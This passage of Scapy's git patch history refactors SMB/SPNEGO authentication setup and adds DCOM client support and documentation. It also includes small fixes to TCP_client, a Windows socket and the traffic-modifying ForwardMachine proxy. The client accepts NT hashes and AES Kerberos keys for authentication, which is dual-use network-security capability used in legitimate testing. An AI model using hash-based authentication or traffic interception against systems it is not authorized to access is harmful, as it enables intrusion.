Authentication failed. @@ -349,6 +352,7 @@ def _bind(self, interface, reqcls, respcls): self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, token=resp.auth_verifier.auth_value, + target_name="host/" + self.host, ) if status in [GSS_S_CONTINUE_NEEDED, GSS_S_COMPLETE]: # Authentication should continue, in two ways: @@ -390,6 +394,7 @@ def _bind(self, interface, reqcls, respcls): self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, token=resp.auth_verifier.auth_value, + target_name="host/" + self.host, ) # Check context acceptance if ( diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index cb73963bbdc..7f92430e1f8 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -1388,6 +1388,7 @@ def GSS_Init_sec_context( self, Context: CONTEXT, token=None, + target_name: Optional[str] = None, req_flags: Optional[GSS_C_FLAGS] = None, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py index 7a6e2be44ed..a19c5b97159 100644 --- a/scapy/layers/smb2.py +++ b/scapy/layers/smb2.py @@ -1594,7 +1594,7 @@ def post_build(self, pkt, pay): }, config=[ ("Offset", _NTLM_ENUM.OFFSET), - ] + ], ) + pay ) diff --git a/scapy/layers/smbclient.py b/scapy/layers/smbclient.py index 64b96589612..14eb47f8cf5 100644 --- a/scapy/layers/smbclient.py +++ b/scapy/layers/smbclient.py @@ -20,7 +20,6 @@ import threading from scapy.automaton import ATMT, Automaton, ObjectPipe -from scapy.base_classes import Net from scapy.config import conf from scapy.error import Scapy_Exception from scapy.fields import UTCTimeField @@ -29,8 +28,6 @@ CLIUtil, pretty_list, human_size, - valid_ip, - valid_ip6, ) from scapy.volatile import RandUUID @@ -40,12 +37,6 @@ GSS_S_CONTINUE_NEEDED, GSS_C_FLAGS, ) -from scapy.layers.inet6 import Net6 -from scapy.layers.kerberos import ( - KerberosSSP, - krb_as_and_tgs, - _parse_upn, -) from scapy.layers.msrpce.raw.ms_srvs import ( LPSHARE_ENUM_STRUCT, NetrShareEnum_Request, @@ -54,7 +45,6 @@ ) from scapy.layers.ntlm import ( NTLMSSP, - MD4le, ) from scapy.layers.smb import ( SMBNegotiate_Request, @@ -146,7 +136,7 @@ def __init__(self, sock, ssp=None, *args, **kwargs): self.REQUIRE_ENCRYPTION = kwargs.pop("REQUIRE_ENCRYPTION", False) self.RETRY = kwargs.pop("RETRY", 0) # optionally: retry n times session setup self.SMB2 = kwargs.pop("SMB2", False) # optionally: start directly in SMB2 - self.SERVER_NAME = kwargs.pop("SERVER_NAME", "") + self.HOST = kwargs.pop("HOST", "") # Store supported dialects if "DIALECTS" in kwargs: self.DIALECTS = kwargs.pop("DIALECTS") @@ -361,7 +351,7 @@ def on_negotiate_smb2(self): # TODO support compression and RDMA SMB2_Negotiate_Context() / SMB2_Netname_Negotiate_Context_ID( - NetName=self.SERVER_NAME, + NetName=self.HOST, ), SMB2_Negotiate_Context() / SMB2_Signing_Capabilities( @@ -458,6 +448,7 @@ def NEGOTIATED(self, ssp_blob=None): ssp_tuple = self.session.ssp.GSS_Init_sec_context( self.session.sspcontext, token=ssp_blob, + target_name="cifs/" + self.HOST if self.HOST else None, req_flags=( GSS_C_FLAGS.GSS_C_MUTUAL_FLAG | (GSS_C_FLAGS.GSS_C_INTEG_FLAG if self.session.SigningRequired else 0) @@ -618,6 +609,7 @@ def AUTHENTICATED(self, ssp_blob=None): self.session.sspcontext, _, status = self.session.ssp.GSS_Init_sec_context( self.session.sspcontext, token=ssp_blob, + target_name="cifs/" + self.HOST if self.HOST else None, ) if status != GSS_S_COMPLETE: raise ValueError("Internal error: the SSP completed with an error.") @@ -1098,17 +1090,18 @@ def close(self): @conf.commands.register class smbclient(CLIUtil): r""" - A simple smbclient CLI + A simple SMB client CLI powered by Scapy :param target: can be a hostname, the IPv4 or the IPv6 to connect to :param UPN: the upn to use (DOMAIN/USER, DOMAIN\USER, USER@DOMAIN or USER) :param guest: use guest mode (over NTLM) :param ssp: if provided, use this SSP for auth. - :param kerberos: if available, whether to use Kerberos or not :param kerberos_required: require kerberos :param port: the TCP port. default 445 - :param password: (string) if provided, used for auth - :param HashNt: (bytes) if provided, used for auth (NTLM) + :param password: if provided, used for auth + :param HashNt: if provided, used for auth (NTLM) + :param HashAes256Sha96: if provided, used for auth (Kerberos) + :param HashAes128Sha96: if provided, used for auth (Kerberos) :param ST: if provided, the service ticket to use (Kerberos) :param KEY: if provided, the session key associated to the ticket (Kerberos) :param cli: CLI mode (default True). False to use for scripting @@ -1125,9 +1118,10 @@ def __init__( UPN: str = None, password: str = None, guest: bool = False, - kerberos: bool = True, kerberos_required: bool = False, - HashNt: str = None, + HashNt: bytes = None, + HashAes256Sha96: bytes = None, + HashAes128Sha96: bytes = None, port: int = 445, timeout: int = 2, debug: int = 0, @@ -1141,71 +1135,30 @@ def __init__( ): if cli: self._depcheck() - hostname = None - # Check if target is a hostname / Check IP - if ":" in target: - family = socket.AF_INET6 - if not valid_ip6(target): - hostname = target - target = str(Net6(target)) - else: - family = socket.AF_INET - if not valid_ip(target): - hostname = target - target = str(Net(target)) assert UPN or ssp or guest, "Either UPN, ssp or guest must be provided !" # Do we need to build a SSP? if ssp is None: # Create the SSP (only if not guest mode) if not guest: - # Check UPN - try: - _, realm = _parse_upn(UPN) - if realm == ".": - # Local - kerberos = False - except ValueError: - # not a UPN: NTLM - kerberos = False - # Do we need to ask the password? - if HashNt is None and password is None and ST is None: - # yes. - from prompt_toolkit import prompt - - password = prompt("Password: ", is_password=True) - ssps = [] - # Kerberos - if kerberos and hostname: - if ST is None: - resp = krb_as_and_tgs( - upn=UPN, - spn="cifs/%s" % hostname, - password=password, - debug=debug, - ) - if resp is not None: - ST, KEY = resp.tgsrep.ticket, resp.sessionkey - if ST: - ssps.append(KerberosSSP(UPN=UPN, ST=ST, KEY=KEY, debug=debug)) - elif kerberos_required: - raise ValueError( - "Kerberos required but target isn't a hostname !" - ) - elif kerberos_required: - raise ValueError( - "Kerberos required but domain not specified in the UPN, " - "or target isn't a hostname !" - ) - # NTLM - if not kerberos_required: - if HashNt is None and password is not None: - HashNt = MD4le(password) - ssps.append(NTLMSSP(UPN=UPN, HASHNT=HashNt)) - # Build the SSP - ssp = SPNEGOSSP(ssps) + ssp = SPNEGOSSP.from_cli_arguments( + UPN=UPN, + target=target, + password=password, + HashNt=HashNt, + HashAes256Sha96=HashAes256Sha96, + HashAes128Sha96=HashAes128Sha96, + ST=ST, + KEY=KEY, + kerberos_required=kerberos_required, + ) else: # Guest mode ssp = None + # Check if target is IPv4 or IPv6 + if ":" in target: + family = socket.AF_INET6 + else: + family = socket.AF_INET # Open socket sock = socket.socket(family, socket.SOCK_STREAM) # Configure socket for SMB: @@ -1218,11 +1171,13 @@ def __init__( sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_KEEPINTVL, 10) # Timeout & connect sock.settimeout(timeout) + if debug: + print("Connecting to %s:%s" % (target, port)) sock.connect((target, port)) self.extra_create_options = [] # Wrap with the automaton self.timeout = timeout - kwargs.setdefault("SERVER_NAME", target) + kwargs.setdefault("HOST", target) self.sock = SMB_Client.from_tcpsock( sock, ssp=ssp, diff --git a/scapy/layers/spnego.py b/scapy/layers/spnego.py index fa1f5e8926f..75ee2202416 100644 --- a/scapy/layers/spnego.py +++ b/scapy/layers/spnego.py @@ -38,6 +38,7 @@ ASN1F_optional, ) from scapy.asn1packet import ASN1_Packet +from scapy.base_classes import Net from scapy.fields import ( FieldListField, LEIntEnumField, @@ -56,7 +57,12 @@ XStrLenField, ) from scapy.packet import Packet, bind_layers +from scapy.utils import ( + valid_ip, + valid_ip6, +) +from scapy.layers.inet6 import Net6 from scapy.layers.gssapi import ( GSSAPI_BLOB, GSSAPI_BLOB_SIGNATURE, @@ -75,8 +81,12 @@ # SSP Providers from scapy.layers.kerberos import ( Kerberos, + KerberosSSP, + _parse_upn, ) from scapy.layers.ntlm import ( + NTLMSSP, + MD4le, NEGOEX_EXCHANGE_NTLM, NTLM_Header, _NTLMPayloadField, @@ -619,6 +629,116 @@ def __init__(self, ssps, **kwargs): self.force_supported_mechtypes = kwargs.pop("force_supported_mechtypes", None) super(SPNEGOSSP, self).__init__(**kwargs) + @classmethod + def from_cli_arguments( + cls, + UPN: str, + target: str, + password: str = None, + HashNt: bytes = None, + HashAes256Sha96: bytes = None, + HashAes128Sha96: bytes = None, + kerberos_required: bool = False, + ST=None, + KEY=None, + debug: int = 0, + ): + """ + Initialize a SPNEGOSSP from a list of many arguments. + This is useful in a CLI, with NTLM and Kerberos supported by default. + + :param UPN: the UPN of the user to use. + :param target: the target IP/hostname entered by the user. + :param kerberos_required: require kerberos + :param password: (string) if provided, used for auth + :param HashNt: (bytes) if provided, used for auth (NTLM) + :param HashAes256Sha96: (bytes) if provided, used for auth (Kerberos) + :param HashAes128Sha96: (bytes) if provided, used for auth (Kerberos) + :param ST: if provided, the service ticket to use (Kerberos) + :param KEY: if ST provided, the session key associated to the ticket (Kerberos). + Else, the user secret key. + """ + kerberos = True + hostname = None + # Check if target is a hostname / Check IP + if ":" in target: + if not valid_ip6(target): + hostname = target + target = str(Net6(target)) + else: + if not valid_ip(target): + hostname = target + target = str(Net(target)) + # Check UPN + try: + _, realm = _parse_upn(UPN) + if realm == ".": + # Local + kerberos = False + except ValueError: + # not a UPN: NTLM only + kerberos = False + # Do we need to ask the password? + if HashNt is None and password is None and ST is None: + # yes. + from prompt_toolkit import prompt + + password = prompt("Password: ", is_password=True) + ssps = [] + # Kerberos + if kerberos and hostname: + # Get ticket if we don't already have one. + if ST is None: + # In this case, KEY is supposed to be the user's key. + from scapy.libs.rfc3961 import Key, EncryptionType + + if KEY is None and HashAes256Sha96: + KEY = Key( + EncryptionType.AES256_CTS_HMAC_SHA1_96, + HashAes256Sha96, + ) + elif KEY is None and HashAes128Sha96: + KEY = Key( + EncryptionType.AES128_CTS_HMAC_SHA1_96, + HashAes128Sha96, + ) + elif KEY is None and HashNt: + KEY = Key( + EncryptionType.RC4_HMAC, + HashNt, + ) + # Make a SSP that only has a UPN and secret. + ssps.append( + KerberosSSP( + UPN=UPN, + PASSWORD=password, + KEY=KEY, + debug=debug, + ) + ) + else: + # We have a ST, use it with the key. + ssps.append( + KerberosSSP( + UPN=UPN, + ST=ST, + KEY=KEY, + debug=debug, + ) + ) + elif kerberos_required: + raise ValueError( + "Kerberos required but domain not specified in the UPN, " + "or target isn't a hostname !" + ) + # NTLM + if not kerberos_required: + if HashNt is None and password is not None: + HashNt = MD4le(password) + ssps.append(NTLMSSP(UPN=UPN, HASHNT=HashNt)) + # Build the SSP + return cls(ssps) + def _extract_gssapi(self, Context, x): status, otherMIC, rawToken = None, None, False # Extract values from GSSAPI @@ -718,6 +838,7 @@ def _common_spnego_handler( Context, IsClient, token=None, + target_name: Optional[str] = None, req_flags=None, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): @@ -779,13 +900,10 @@ def _common_spnego_handler( # The currently provided token is for this SSP ! # Pass it to the sub ssp, with its own context if IsClient: - ( - Context.sub_context, - tok, - status, - ) = Context.ssp.GSS_Init_sec_context( + Context.sub_context, tok, status = Context.ssp.GSS_Init_sec_context( Context.sub_context, token=token, + target_name=target_name, req_flags=Context.req_flags, chan_bindings=chan_bindings, ) @@ -946,6 +1064,7 @@ def GSS_Init_sec_context( self, Context: CONTEXT, token=None, + target_name: Optional[str] = None, req_flags: Optional[GSS_C_FLAGS] = None, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): @@ -953,6 +1072,7 @@ def GSS_Init_sec_context( Context, True, token=token, + target_name=target_name, req_flags=req_flags, chan_bindings=chan_bindings, ) diff --git a/scapy/libs/rfc3961.py b/scapy/libs/rfc3961.py index baa041a1c4c..858a9fa2073 100644 --- a/scapy/libs/rfc3961.py +++ b/scapy/libs/rfc3961.py @@ -22,10 +22,12 @@ # TODO: support cipher states... __all__ = [ - "EncryptionType", "ChecksumType", - "Key", + "EncryptionType", "InvalidChecksum", + "KRB_FX_CF2", + "Key", + "SP800108_KDFCTR", "_rfc1964pad", ] diff --git a/scapy/utils.py b/scapy/utils.py index 2a381dac9d8..320349243c6 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -3940,13 +3940,14 @@ def AutoArgparse( # Process the parameters positional = [] noargument = [] + hexarguments = [] parameters = {} for param in inspect.signature(func).parameters.values(): if not param.annotation: continue noarg = False - parname = param.name - paramkwargs = {} + parname = param.name.replace("_", "-") + paramkwargs: Dict[str, Any] = {} if param.annotation is bool: if param.default is True: parname = "no-" + parname @@ -3954,6 +3955,9 @@ def AutoArgparse( else: paramkwargs["action"] = "store_true" noarg = True + elif param.annotation is bytes: + paramkwargs["type"] = str + hexarguments.append(parname) elif param.annotation in [str, int, float]: paramkwargs["type"] = param.annotation else: @@ -3971,6 +3975,14 @@ def AutoArgparse( paramkwargs["action"] = "append" if param.name in argsdoc: paramkwargs["help"] = argsdoc[param.name] + if param.annotation is bytes: + paramkwargs["help"] = "(hex) " + paramkwargs["help"] + elif param.annotation is bool: + paramkwargs["help"] = "(flag) " + paramkwargs["help"] + else: + paramkwargs["help"] = ( + "(%s) " % param.annotation.__name__ + paramkwargs["help"] + ) # Add to the parameter list parameters[parname] = paramkwargs if noarg: @@ -3992,11 +4004,25 @@ def AutoArgparse( # Add parameters to parser for parname, paramkwargs in parameters.items(): - parser.add_argument(parname, **paramkwargs) # type: ignore + parser.add_argument(parname, **paramkwargs) # Now parse the sys.argv parameters params = vars(parser.parse_args()) + # Convert hex parameters if provided + for p in hexarguments: + if params[p] is not None: + try: + params[p] = bytes.fromhex(params[p]) + except ValueError: + print( + conf.color_theme.fail( + "ERROR: the value of parameter %s " + "'%s' is not valid hexadecimal !" % (p, params[p]) + ) + ) + return None + # Act as in interactive mode conf.logLevel = 20 from scapy.themes import DefaultTheme @@ -4011,7 +4037,7 @@ def AutoArgparse( } ) except AssertionError as ex: - print("ERROR: " + str(ex)) + print(conf.color_theme.fail("ERROR: " + str(ex))) parser.print_help() return None From d6a25bb80a777eee31761c93db8fc6cd587a019a Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 6 Aug 2025 07:52:23 -0600 Subject: [PATCH 1527/1632] Fix blatant typos (#4811) --- doc/scapy/advanced_usage/fwdmachine.rst | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/doc/scapy/advanced_usage/fwdmachine.rst b/doc/scapy/advanced_usage/fwdmachine.rst index d51594c1b0e..24b5bcd3b41 100644 --- a/doc/scapy/advanced_usage/fwdmachine.rst +++ b/doc/scapy/advanced_usage/fwdmachine.rst @@ -2,19 +2,18 @@ Forwarding Machine ****************** -Scapy's ``ForwardMachine`` is a utility that allows to create server that forwards packets to another server, with the ability -to modify them on-the-fly. This is similar to a "proxy", but works with any protocols over IP/IPv6. The ``ForwardMachine`` was initially designed to be used with TPROXY, -a linux feature that allows to bind a socket that received *packets to any IP destination* (in which case it properly forwards the packet to the initially -intended destination), but it also work as a standalone server. +Scapy's ``ForwardMachine`` is a utility that allows to create a server that forwards packets to another server, with the ability +to modify them on-the-fly. This is similar to a "proxy", but works on the layer 4 (rather than 5+). The ``ForwardMachine`` was initially designed to be used with TPROXY, +a linux feature that allows to bind a socket that receives *packets to any IP destination* (usually, a socket only receives packets whose destination is local), but it also work as a standalone server (that binds a normal socket). A ``ForwardMachine`` is expected to be used over a normal Python socket, of any kind, and needs to extended with two -functions: ``xfrmcs`` and ``xfrmsc``. The first one is called whenever data is received from the client side (client-to-server), the other when the data -is received from the server. +functions: ``xfrmcs`` and ``xfrmsc``. The first one is called whenever data is received from the client side (client-to-server, "cs"), the other when the data +is received from the server (server-to-client, "sc") ``ForwardMachine`` can be used in two modes: -- **TPROXY** -- **SERVER**, in which case a normal socket is bound. Think of it as a glorified socat +- **TPROXY**, acts as a transparent proxy that intercepts one or many connections towards multiple servers +- **SERVER**, acts like a glorified socat that accepts connections towards the local server Basic usage ___________ From f97890dfe22bd1edf00e8424a1f554e2542477b3 Mon Sep 17 00:00:00 2001 From: "Teppei.F" <37261985+T3pp31@users.noreply.github.com> Date: Mon, 18 Aug 2025 17:25:23 +0900 Subject: [PATCH 1528/1632] Fix check when closing native L3 windows socket (#4820) * Update native.py * Add test for L3WinSocket.close() with partial init Introduces a test to ensure L3WinSocket.close() does not raise AttributeError when called on a partially initialized object. This improves robustness by verifying correct handling of incomplete initialization. --- scapy/arch/windows/native.py | 2 +- test/windows.uts | 21 +++++++++++++++++++++ 2 files changed, 22 insertions(+), 1 deletion(-) diff --git a/scapy/arch/windows/native.py b/scapy/arch/windows/native.py index 61cfa8beb8a..b2b457da615 100644 --- a/scapy/arch/windows/native.py +++ b/scapy/arch/windows/native.py @@ -222,7 +222,7 @@ def recv_raw(self, x=MTU): def close(self): # type: () -> None - if not self.closed and self.promisc: + if not self.closed and self.promisc and hasattr(self, 'ins'): self.ins.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF) super(L3WinSocket, self).close() diff --git a/test/windows.uts b/test/windows.uts index 59202833331..394376be0c2 100644 --- a/test/windows.uts +++ b/test/windows.uts @@ -117,6 +117,27 @@ def _test(): retry_test(_test) += Test L3WinSocket close() with partial initialization +~ windows + +from scapy.arch.windows.native import L3WinSocket +import socket + +# Create partially initialized L3WinSocket +ws = object.__new__(L3WinSocket) +ws.closed = False +ws.promisc = True +# Note: ws.ins is intentionally not set + +# This should not raise AttributeError +try: + ws.close() + test_passed = True +except AttributeError: + test_passed = False + +assert test_passed, "L3WinSocket.close() raised AttributeError on partially initialized object" + = Leave native mode conf.use_pcap = True From b5ebda1bd21b054b31e576c6ae522a0c3cca9b0f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Tue, 19 Aug 2025 09:51:50 +0200 Subject: [PATCH 1529/1632] Add some missing parameters to TCP_Client (#4821) * Add some missing parameters to TCP_Client * Also add source port --- scapy/layers/inet.py | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/scapy/layers/inet.py b/scapy/layers/inet.py index a361664a681..6e01c9b253f 100644 --- a/scapy/layers/inet.py +++ b/scapy/layers/inet.py @@ -2165,16 +2165,20 @@ class TCP_client(Automaton): :param ip: the ip to connect to :param port: :param src: (optional) use another source IP + :param sport: (optional) the TCP source port (default: random) + :param seq: (optional) initial TCP sequence number (default: random) """ - def parse_args(self, ip, port, srcip=None, **kargs): + def parse_args(self, ip, port, srcip=None, sport=None, seq=None, ack=0, **kargs): from scapy.sessions import TCPSession self.dst = str(Net(ip)) self.dport = port - self.sport = random.randrange(0, 2**16) + self.sport = sport if sport is not None else random.randrange(0, 2**16) self.l4 = IP(dst=ip, src=srcip) / TCP( sport=self.sport, dport=self.dport, - flags=0, seq=random.randrange(0, 2**32) + flags=0, + seq=seq if seq is not None else random.randrange(0, 2**32), + ack=ack, ) self.src = self.l4.src self.sack = self.l4[TCP].ack From 9db27e9a8ece7bca34310a13c6978763cc058072 Mon Sep 17 00:00:00 2001 From: Xavier Mehrenberger Date: Wed, 20 Aug 2025 10:00:30 +0200 Subject: [PATCH 1530/1632] Forwarding machine: fix and doc (#4823) * Fix writing cert to disk in fwdmachine a Cert object's pem property is a str, returned by der2pem(). Opening an output file in binary mode then trying to write a str to it results in a stacktrace. * Fix ForwardMachine documentation --- scapy/fwdmachine.py | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/scapy/fwdmachine.py b/scapy/fwdmachine.py index 04060b02cc3..023c002354c 100644 --- a/scapy/fwdmachine.py +++ b/scapy/fwdmachine.py @@ -86,9 +86,10 @@ class ForwardMachine: Methods to override: :func xfrmcs: a function to call when forwarding a packet from the 'client' to - the server. If it returns True, the packet is forwarded as it. If it - returns False or None, the packet is discarded. If it returns a - packet, this packet is forwarded instead of the original packet. + the server. If it raises a FORWARD exception, the packet is forwarded as it. If + it raises a DROP Exception, the packet is discarded. If it raises a + FORWARD_REPLACE(pkt) exception, then pkt is forwarded instead of the original + packet. :func xfrmsc: same as xfrmcs for packets forwarded from the 'server' to the 'client'. """ @@ -372,7 +373,7 @@ def cb_sni(sock, server_name, _): # Load result certificate our SSL server # (this is dumb but we need to store them on disk) certfile = get_temp_file() - with open(certfile, "wb") as fd: + with open(certfile, "w") as fd: for c in certs: fd.write(c.pem) keyfile = get_temp_file() From b8100329ad1a4e30f6e0bc64c311aa28d11baefe Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 20 Aug 2025 16:23:34 +0200 Subject: [PATCH 1531/1632] DCE/RPC: Add DCOM support (#4815) * DCE/RPC: Add proper DCOM client * Add DCOM documentation * Apply review fixes * PEP8 fixes * Use auto-generated [MS-EERR] * Fix spelling * Fix tests * fixes * Improve context processing server side * Fix PEP8 * Fix tests --- doc/scapy/build_dissect.rst | 2 +- doc/scapy/layers/dcerpc.rst | 2 +- doc/scapy/layers/dcom.rst | 128 +++ scapy/config.py | 2 + scapy/layers/dcerpc.py | 359 ++++++-- scapy/layers/msrpce/ept.py | 32 +- scapy/layers/msrpce/msdcom.py | 1239 +++++++++++++++++++++++++--- scapy/layers/msrpce/mseerr.py | 188 +---- scapy/layers/msrpce/mspac.py | 33 +- scapy/layers/msrpce/raw/ms_dcom.py | 361 +++++++- scapy/layers/msrpce/raw/ms_eerr.py | 194 +++++ scapy/layers/msrpce/rpcclient.py | 363 +++++--- scapy/layers/msrpce/rpcserver.py | 118 ++- scapy/layers/ntlm.py | 9 - scapy/layers/smb2.py | 4 + scapy/layers/smbclient.py | 10 +- scapy/modules/ldaphero.py | 6 +- scapy/modules/ticketer.py | 6 +- scapy/packet.py | 2 +- test/scapy/layers/dcerpc.uts | 4 +- test/scapy/layers/kerberos.uts | 17 +- test/scapy/layers/msnrpc.uts | 12 +- 22 files changed, 2509 insertions(+), 582 deletions(-) create mode 100644 doc/scapy/layers/dcom.rst create mode 100644 scapy/layers/msrpce/raw/ms_eerr.py diff --git a/doc/scapy/build_dissect.rst b/doc/scapy/build_dissect.rst index 26c0148ea14..2f53c349933 100644 --- a/doc/scapy/build_dissect.rst +++ b/doc/scapy/build_dissect.rst @@ -649,7 +649,7 @@ look to its building process:: def post_build(self, p, pay): if self.len is None and pay: l = len(pay) - p = p[:1] + hex(l)[2:]+ p[2:] + p = p[:1] + struct.pack("!B", l) + p[2:] return p+pay When ``post_build()`` is called, ``p`` is the current layer, ``pay`` the payload, diff --git a/doc/scapy/layers/dcerpc.rst b/doc/scapy/layers/dcerpc.rst index aaac3af3429..7e08b59202e 100644 --- a/doc/scapy/layers/dcerpc.rst +++ b/doc/scapy/layers/dcerpc.rst @@ -1,7 +1,7 @@ DCE/RPC & [MS-RPCE] =================== -.. note:: DCE/RPC per `DCE/RPC 1.1 `_ with the `[MS-RPCE] `_ additions +.. note:: DCE/RPC per `DCE/RPC 1.1 `_ with the `[MS-RPCE] `_ additions. Scapy provides support for dissecting and building Microsoft's Windows DCE/RPC calls. diff --git a/doc/scapy/layers/dcom.rst b/doc/scapy/layers/dcom.rst new file mode 100644 index 00000000000..ada9a56a0b8 --- /dev/null +++ b/doc/scapy/layers/dcom.rst @@ -0,0 +1,128 @@ +[MS-DCOM] +========= + +DCOM is a mechanism to manipulate COM objects remotely. It is in many ways just an extension over normal DCE/RPC, so understanding DCE/RPC concepts beforehand can be very useful. +Before reading this, have a look at Scapy's `DCE/RPC `_ documentation page. + +Terminology +----------- + +- In DCOM one instantiates 'classes' to get 'object references'. A class implements one or several 'interfaces', each of which has methods. +- ``CLSID``: the UIID of a **class**, used to instantiate it. This is typically chosen by whoever implements the COM object. +- ``IID``: the UIID of an **interface**, used to request an IPID. This is chosen by whoever defines the COM interface (mostly Microsoft). +- ``IPID``: a UIID that uniquely references an **interface on an object**. This allows to tell DCOM on which object to run the request we send. + +There are other IDs such as the OID (a 64bit number that uniquely references each object), and the OXID (a 64bit number that uniquely references each object exporter), but we won't get into the details. + +Per the spec, a DCOM client is supposed to keep track of the IPID, OID and OXID ids. In this regard, Scapy abstracts their usage. +On the other hand, the calling application is supposed to know the ``CLSID`` of the class it wishes to instantiate, and the various ``IID`` of the interfaces it wishes to use. + +General behavior of a DCOM client +--------------------------------- + +1. Setup the DCOM client (endpoint, SSP, etc.) +2. Get an object reference: Instantiate a class to get an object reference of the instance (``RemoteCreateInstance``), **OR**, get an object reference towards the class itself (``RemoteGetClassObject``). +3. Acquire the IPID of an interface of the object. +4. Call a method of that interface. +5. Release the reference counts on the interface (delete the IPID). + +Step 3 can be done manually through the ``AcquireInterface()`` method, but Scapy will also automatically call it if you try to use an interface that you haven't acquired on an object. + +Using the DCOM client +--------------------- + +General usage +~~~~~~~~~~~~~ + +1. Setup the DCOM client and connect to the object resolver (which is by default on port 135). + +.. code:: python + + from scapy.layers.msrpce.msdcom import DCOM_Client + from scapy.layers.ntlm import NTLMSSP + + client = DCOM_Client( + ssp=NTLMSSP(UPN="Administrator@domain.local", PASSWORD="Scapy1111@"), + ) + client.connect("server1.domain.local") + +.. note:: See the examples in `DCE/RPC `_ to connect with SPNEGO/Kerberos. + +2. Instantiate a class to get an object reference + +.. code:: python + + import uuid + from scapy.layers.dcerpc import find_com_interface + import scapy.layers.msrpce.raw.ms_pla + + CLSID_TraceSessionCollection = uuid.UUID("03837530-098b-11d8-9414-505054503030") + # The COM interface must have been compiled by scapy-rpc (midl-to-scapy) + IDataCollectorSetCollection = find_com_interface("IDataCollectorSetCollection") + + # Get new object reference + objref = client.RemoteCreateInstance( + # The CLSID we're instantiating + clsid=CLSID_TraceSessionCollection, + iids=[ + # An initial list of interfaces to ask for. There must be at least 1. + IDataCollectorSetCollection, + ] + ) + +3. Call a method on that object reference + +.. code:: python + + result = objref.sr1_req( + # The request message (here from [MS-PLA]) + pkt=GetDataCollectorSets_Request( + server=None, + filter=NDRPointer( + referent_id=0x72657355, + value=FLAGGED_WORD_BLOB( + cBytes=18, + asData=r"session\*".encode("utf-16le"), + ) + ), + ), + # The interface to send it on + iface=IDataCollectorSetCollection, + ) + +4. Release all the requested interfaces on the object reference + +.. code:: python + + objref.release() + +5. Close the client + +.. code:: python + + client.close() + + +Unmarshalling object references +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Some methods return a reference to an object that is created by the remote server. On the network, +those are typically marshalled as a ``MInterfacePointer`` structure. Such a structure can be "unmarshalled" into a local object reference that can be used in Scapy to call methods on that object. + +.. code:: python + + # For instance, let's assume we're calling Next() of the IEnumVARIANT + resp = enum.sr1_req( + pkt=Next_Request(celt=1), + iface=IEnumVARIANT, + ) + + # Get the MInterfacePointer value + value = resp.valueof("rgVar")[0].valueof("_varUnion") + assert isinstance(value, MInterfacePointer) + + # Unmarshall it and acquire an initial interface on it. + objref = client.UnmarshallObjectReference( + value, + iid=IDataCollectorSet, + ) diff --git a/scapy/config.py b/scapy/config.py index 2a385c2f579..be3cb25b278 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -1146,6 +1146,8 @@ class Conf(ConfClass): ) #: Dictionary containing parsed NSS Keys tls_nss_keys: Dict[str, bytes] = None + #: Whether to use NDR64 by default instead of NDR 32 + ndr64: bool = True #: When TCPSession is used, parse DCE/RPC sessions automatically. #: This should be used for passive sniffing. dcerpc_session_enable = False diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index 6110fe1273c..28dfa6f97a0 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -21,12 +21,15 @@ `DCE/RPC `_ """ -from functools import partial - import collections +import importlib +import inspect import struct + from enum import IntEnum +from functools import partial from uuid import UUID + from scapy.base_classes import Packet_metaclass from scapy.config import conf @@ -116,6 +119,7 @@ # Typing imports from typing import ( Optional, + Union, ) # the alignment of auth_pad @@ -179,11 +183,45 @@ class DCERPC_Transport(IntEnum): - NCACN_IP_TCP = 1 - NCACN_NP = 2 + """ + Protocols identifiers currently supported by Scapy + """ + + NCACN_IP_TCP = 0x07 + NCACN_NP = 0x0F # TODO: add more.. if people use them? +# [C706] Appendix I with names from Appendix B +DCE_RPC_PROTOCOL_IDENTIFIERS = { + 0x0: "OSI OID", # Special + 0x0D: "UUID", # Special + # Transports + # 0x2: "DNA Session Control", + # 0x3: "DNA Session Control V3", + # 0x4: "DNA NSP Transport", + # 0x5: "OSI TP4", + 0x06: "NCADG_OSI_CLSN", # [C706] + 0x07: "NCACN_IP_TCP", # [C706] + 0x08: "NCADG_IP_UDP", # [C706] + 0x09: "IP", # [C706] + 0x0A: "RPC connectionless protocol", # [C706] + 0x0B: "RPC connection-oriented protocol", # [C706] + 0x0C: "NCALRPC", + 0x0F: "NCACN_NP", # [MS-RPCE] + 0x11: "NCACN_NB", # [C706] + 0x12: "NCACN_NB_NB", # [MS-RPCE] + 0x13: "NCACN_SPX", # [C706] + 0x14: "NCADG_IPX", # [C706] + 0x16: "NCACN_AT_DSP", # [C706] + 0x17: "NCADG_AT_DSP", # [C706] + 0x19: "NCADG_NB", # [C706] + 0x1A: "NCACN_VNS_SPP", # [C706] + 0x1B: "NCADG_VNS_IPC", # [C706] + 0x1F: "NCACN_HTTP", # [MS-RPCE] +} + + def _dce_rpc_endianness(pkt): """ Determine the right endianness sign for a given DCE/RPC packet @@ -585,18 +623,9 @@ class DceRpcSecVTCommand(Packet): }, end_tot_size=-2, ), - LEShortField("Length", None), + LenField("Length", None, fmt=" DceRpcInterface: """ Find an interface object through the name in the IDL """ @@ -1255,6 +1316,8 @@ def 